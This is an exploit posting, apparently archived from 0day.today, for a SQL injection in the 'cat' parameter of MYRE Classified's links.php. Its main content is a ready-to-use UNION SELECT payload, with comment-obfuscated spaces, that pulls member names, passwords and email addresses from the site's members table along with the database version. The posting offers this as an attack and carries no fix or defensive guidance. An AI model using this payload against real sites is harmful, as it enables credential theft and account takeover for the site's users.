MYRE Classified (cat) SQL Injection Vulnerability

2010-02-02T00:00:00
ID 1337DAY-ID-10755
Type zdt
Reporter kaMtiEz
Modified 2010-02-02T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =================================================
MYRE Classified (cat) SQL Injection Vulnerability
=================================================

###################################################################################
 
[ Software Information ]
 
[+] Vendor : http://myrephp.com/
[+] Vulnerability : SQL injection
[+] Dork : "syalalala"
[+] Price : $499          
[+] Location : INDONESIA - JOGJA
 
##################################################################################
 
 
[ HERE WE GO .. LIVE FROM JOGJA CITY ]
 
[ Vulnerable File ]
 
http://127.0.0.1/[kaMtiEz]/links.php?cat=[INDONESIANCODER]
 
[ Exploit ]
 
-666/**/union/**/all/**/select/**/666,666,666,concat_ws(0x3a,member_name,member_password,email)kaMtiEz,@@version,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666/**/from/**/members--
 
===========================================================================



#  0day.today [2018-02-06]  #